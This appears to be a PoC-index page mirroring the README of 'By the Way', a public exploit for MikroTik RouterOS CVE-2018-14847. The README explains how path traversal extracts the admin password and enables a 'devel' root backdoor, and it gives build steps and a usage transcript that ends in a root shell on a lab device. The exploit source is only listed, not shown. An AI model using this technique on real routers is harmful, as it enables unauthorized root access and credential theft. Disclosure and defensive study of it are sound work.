POC详情: 4fa0052e031b42470283b44b46c74273fa899ae3

来源
https://github.com/babyshen/routeros-CVE-2018-14847-bytheway
关联漏洞
标题: Winbox for MikroTik RouterOS 安全漏洞 (CVE-2018-14847)
描述:MikroTik RouterOS是一套路由操作系统。Winbox for MikroTik RouterOS是一个用于管理MikroTik RouterOS系统的应用程序。 Winbox for MikroTik RouterOS 6.42及之前版本中存在安全漏洞。远程攻击者可通过修改请求利用该漏洞绕过身份验证并读取任意文件。
描述
By the Way is an exploit that enables a root shell on Mikrotik devices running RouterOS versions:
介绍
# By the Way

By the Way is an exploit that enables a root shell on Mikrotik devices running RouterOS versions:

* Longterm: 6.30.1 - 6.40.7
* Stable: 6.29 - 6.42.0
* Beta: 6.29rc1 - 6.43rc3

The exploit leverages the path traversal vulnerability CVE-2018-14847 to extract the admin password and create an "option" package to enable the developer backdoor. Post exploitation the attacker can connect to Telnet or SSH using the root user "devel" with the admin's password.

Mikrotik patched CVE-2018-14847 back in April. However, until this PoC was written, I don't believe its been publicly disclosed that the attack can be levegered to write files. You can find Mikrotik's advisory here:

* https://blog.mikrotik.com/security/winbox-vulnerability.html

Note that, while this exploit is written for Winbox, it could be ported to HTTP as long as you had prior knowledge of the admin credentials.

## Dependencies
This PoC relies on:

* Boost 1.66
* pthread
* cmake

## Build Insturctions

```sh
mkdir build
cd build
cmake ..
make
```

## Usage Example

```sh
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 
Login failed, incorrect username or password

Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251

   ╔╗ ┬ ┬  ┌┬┐┬ ┬┌─┐  ╦ ╦┌─┐┬ ┬
   ╠╩╗└┬┘   │ ├─┤├┤   ║║║├─┤└┬┘
   ╚═╝ ┴    ┴ ┴ ┴└─┘  ╚╩╝┴ ┴ ┴ 

[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials 
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 


BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.
```
文件快照

 [4.0K]  /data/pocs/4fa0052e031b42470283b44b46c74273fa899ae3
├── [ 777]  CMakeLists.txt
├── [4.0K]  common
│   ├── [7.8K]  md5.cpp
│   ├── [1.7K]  session.cpp
│   ├── [ 53K]  winbox_message.cpp
│   └── [9.6K]  winbox_session.cpp
├── [2.3K]  README.md
└── [4.0K]  src
    └── [ 14K]  main.cpp

2 directories, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。